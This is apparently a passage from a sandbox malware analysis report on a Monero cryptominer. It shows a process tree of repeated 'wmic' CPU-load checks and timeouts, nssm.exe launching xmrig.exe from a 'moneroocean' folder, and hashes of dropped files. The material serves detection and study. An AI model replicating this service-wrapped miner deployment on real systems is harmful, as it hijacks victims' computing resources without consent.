- Delays execution with timeout.exe
PID:3396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4240
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4156
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4116
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1640
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2548
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4704
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4676
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2396
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:516
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3028
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2208
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:2372
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4416
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:832
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3876
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3180
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:764
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2152
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3052
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4740
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3988
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2448
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1360
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1300
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2028
-
-
-
C:\Users\Admin\moneroocean\nssm.exeC:\Users\Admin\moneroocean\nssm.exe1⤵
- Executes dropped EXE
PID:3908 -
C:\Users\Admin\moneroocean\xmrig.exe"C:\Users\Admin\moneroocean\xmrig.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3360
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
Filesize
1KB
MD5f05def3a08d690ac19df1c4c71d5f588
SHA17a8d91ab7879e61d936b327fa6273375d1225907
SHA2563bc1de925cc474a63e89774bed96e71858b0821b6b9c333a689e85f79bd37989
SHA512f2296eeaaa15b0961b055ff1ae498061f441f12adc534f9f297af1784796094106604d1cbe8894225404fe1f51e60aa03aed65a9cdcb8582a204c19b904370ab
-
Filesize
1KB
MD53ec9241958a1b849fe267bf805a4a33a
SHA1b158b16b6cc154616b7cc452ee76c7a7fda067bc
SHA256ecc8559fe42c45c3ec3baeb40ce01425ca3de5ee4d1128cc47ed20745694361e
SHA512c7efc7764cd391cfa9446870aca253ba978b876f82a83a2d6348cc387a7a2fb9335c246f286244f917fcc06bc6b70811964b698e71c0d43ad290d852749cc4e5
-
Filesize
1KB
MD59832ace68d139ba56f0ce00f2f163659
SHA1e34941eb86105cf525e688bbeb1171369dfa23c3
SHA256e360305acdc8466574858dc4c85e3e68369f3749b5afb30a71fabaf2878ff2c3
SHA51270ca75ff30ef240fe3d1ae07c195806463e5c9625b6e2d4e9b074ea18e585f638cdab0a6d1f23e605e5f04dfeafb7160ba48861d982c0c0bc51f557f551de7cf
-
Filesize
1KB
MD5b3bd6a0b6755e0f820f7a1134087442f
SHA1511f7617cea005243545b44e327ff5c012b00790
SHA256ffdeaf6a32ff9ee761af4bc5b9396d8cbe1db98c8237c0548ca73331e68c53ff
SHA512cd406ed0cc03fee428536a110a2492ef5a96dc77a8f27db89dc6d3f6b3d40da9d7302630df66ebb165b28bfbe35207a9b188d054f4a388d2104cb0e94a163e6e
-
Filesize
1KB
MD5a21ebe5330dbc19e0ba1197d31e56db1
SHA16135a9d186399433969b52da0afa5c2887c87239
SHA25609e105d36878979176d2a2deced5f0052c741a2090106e435ee1ec24f1527913
SHA5127b61380810c3a99ea0e92efec7264ad66c956270037b1a5952659a4df20a3b04fb4dc5b894de752fff28c8986fb3329b3ae07685abd276c7ad2c29c90780b896
-
Filesize
1KB
MD540f93e3b59ff1476cee66c9415b468c6
SHA193a8b23b2b4d51957d921bba8a6db49517ce37f3
SHA256408edb29b5d8b3dc872e7298d937132bb702b9f39de6be67a5e838b46a724795
SHA5125dfdcfa0fdb8e46817bf6ba813499924ecbecc7f2f47e63af2961a2962e44cd4cd607d49cbfae836e3bd7c8854fd50d79d5ae5f5b5464678be49ad433690edf4
-
Filesize
1KB
MD5969f8f6865bb8c86bf9d18f0c430d46d
SHA15e67d36d0c3c7e9e045c1211b4a0720b9d8c1179
SHA2567b0ef83bab1851bdb98840ecd34ccb510a703c0459b03c8191e50468b634816f
SHA5128475d5d0443cdd72abbefb659a9ac8854118b845365f93446fd2fbb22c0170a43a25074f7c716c6ab64f1373d3260c1c6e6536085a444b7650a58c9778c31d04
-
Filesize
1KB
MD57a29b4d57c5ce46ec7b74f6d37e2c197
SHA1bad71fc34b12f45624107b5bad9e7a385c014c14
SHA25643bd615609c6f179c0ef81d66c591cea09cb3d00e9c9373fbf44d38caaf0e00a
SHA512103999f7004d1cef5c31f75fef5bea4d0b15dfc8c814463706676a25ffcf390f5b434c42d670a4d193878d036db5edfe5104602921116ae8b8b662b8d2db2180
-
Filesize
1KB
MD54c1d303313ef009008d092f48e58dda8
SHA19a11a098ebf12d9c4a6d3c22d18016c83147b811
SHA256c5a8b297b9f6bd8b7b0f858dfe981bccc93c12598fe20168539965d4ecf100d6
SHA512abd0448a40a1039f695274ca8f4576342686be2ff4d08f719f97d632d2dc69ce461480d5152efd77750932b783271212c3159fb24725da15e2103ba1bbbe9135
-
Filesize
1KB
MD5b127cec984deb86bb9572a5cf078149e
SHA149cbdee2899c2d2eb576674ce697bebebb702615
SHA256f8c74c069fc18421485b3231c1494cc88df3cd4a7ca48d913eb950b0982108a3
SHA512e83ff89b3cb61a93fc9d3b83066948558c8810cc6c5ebb9a0717cfd4f5f776667831a5bfb0792c803c73d492d469b6628fea67f3ee54f8289affc466f37e3db4
-
Filesize
1KB
MD55d7defb7403deab0b914be11f2f738e5
SHA1677c95e426b05c2363843a6567b3bea581238a45
SHA2563588bf94aadac9f5d8b9072a9faee3df3d38b906bbc965ff10e53e6716ee37b8
SHA512eb97ba94b3ee8b964d819e1e575641c6a51b679b60cfb958e6c63a780c9f9c03c47bba96bbddf9548ba6649e5312c28806a2a6eda3d1eb9304c0fce2662b14f0
-
Filesize
1KB
MD59bd7b1897349bf9def64bcb32eb8912a
SHA1433fb1984077cff4250bb344bfd8925246e01c17
SHA256e82d100a05bc98d5c0984ca74caf4d9b3060fdaed39692685975a6c9baeff0c9
SHA51248fbd3c33663efe2cfb1d03d8191c95d08e0e2925d4b7aaf316e28cea7c0527eced727510a5ef89c8d7e3a81a8073f5b0f4eb998ec957193f71c00a6bb869ee2
-
Filesize
1KB
MD543ef230ecd6471bddd365ff1a30e2c55
SHA11206d6d1f2f409fbf1097c252d228e27fa80646a
SHA256ee6a04eea783420c55123e000403a213c28a94ae8d7101c668b7396abf12f7ac
SHA512fb090809ebc757856d7f544e5c7789065b7c2d7099bf8e3f7576103899ce92ec1a6a2a5027fbac500337312a2246208c27dff912ac5133a5119d10ceadd39787
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
556B
MD5889ed31bd87dcdd18996201e93fca965
SHA1bebcb6fa0d36fabc6edc469cc3177251bd50dbb8
SHA2566fd0f837746697ef471db89d8fa9290114c4c2dd416020f5ad9dc1837fb16ee7
SHA51211e131928d8a7fd30b20943aeda62a9185b9b961fc577a75a6de87635b5a89a13fcbbfbbf0abd8e6a5cdc3052ef98c40bbebb33252ec00e73fcf18debda10f0a
-
Filesize
14KB
MD5623f6006f683afdb4b7406e3a4ec35bf
SHA1f63f03d7338317224726eba368f1a045fa2142d7
SHA25621d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b
SHA512df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab
-
Filesize
2KB
MD5d4f8a13f8c90e2b3b2e7d30a553df39c
SHA15c5303ef682ffcd31e57d1abd900ba5b637d51e4
SHA256f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a
SHA51268b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd
-
Filesize
2KB
MD5c9ef9c214996db3d88f571226910c5d5
SHA1420ba30247b1e09f706557a7704a1ebee5d3165c
SHA256fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1
SHA512de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d
-
Filesize
2KB
MD565af2c948d2b89c9a105d1fb0b467885
SHA11344cc7d00abe84bdbd9f35c7ce4a665e7e45773
SHA25690f5d28d166590d5854231b924a0115ccc1ebc6c2ae56e14b787b05e83c78e4a
SHA51237536a9629a61a83cd31f22cfb63d381bc2b13bf4bbc84f40d475b14e7e80df11434697e5b57814fccfcc04be31937aab84de5260af6321111904dfd200a92a6
-
Filesize
2KB
MD5218e733fb5893037dad78616a07b7e47
SHA19ffeff76eba9f495c7645fb3b1af4dbecdb1a89d
SHA256fd1000799df510f8c47d2d9f54b77fab098444bf6f2d9e32811f7e04cc2038b0
SHA51219f222e23a313e2a56192931356437fb50abe3a13bf78ed21573d05d60bec419cc82721368112054608488362b80d834ba0697fbfd419de8b34ec52070df5dcb
-
Filesize
2KB
MD5db5031bbcd45eac597bb5680002fc2fb
SHA1d93bca0e80b94b1eb4d1ebd6ea61d9dc982bbfd2
SHA256a528101cf33a30cbe7c9773a0ff208dca6126f27faae7ad2140104f938a667f4
SHA512a541c94cabf1874b3265fad7bcd928e5b914f0edda0f5d18f3356bc2f0d7602921ab13d4a07f26b01ac8761015e632e2fb42c3f8e4e762a11852ece0787d952a
-
Filesize
2KB
MD546fbdeaa880e041aab3729a9767766cc
SHA1af43ed7a8f1eab9b8fd3fc56d8aba00948ae303b
SHA256c2cf5a337399e5b962deac41ec8813b002a898bf06506f16292e4ec75e4461a1
SHA5122caa68eb509e57c515ea1bca805a12d004826029fbf60fbf12cc6f0d3802091a56f5799499a9b5ffb9fd71fc70f62141719627009af1fb47d5dcfcfe279dcbf0
-
Filesize
360KB
MD51136efb1a46d1f2d508162387f30dc4d
SHA1f280858dcfefabc1a9a006a57f6b266a5d1fde8e
SHA256eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848
SHA51243b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5
-
Filesize
9.0MB
MD59ee2c39700819e5daab85785cac24ae1
SHA19b5156697983b2bdbc4fff0607fadbfda30c9b3b
SHA256e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3
SHA51247d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649
-
Filesize
135KB
MD57ad31e7d91cc3e805dbc8f0615f713c1
SHA19f3801749a0a68ca733f5250a994dea23271d5c3
SHA2565b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201
SHA512d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260
-
Filesize
3.5MB
MD5640be21102a295874403dc35b85d09eb
SHA1e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4
SHA256ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b
SHA512ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e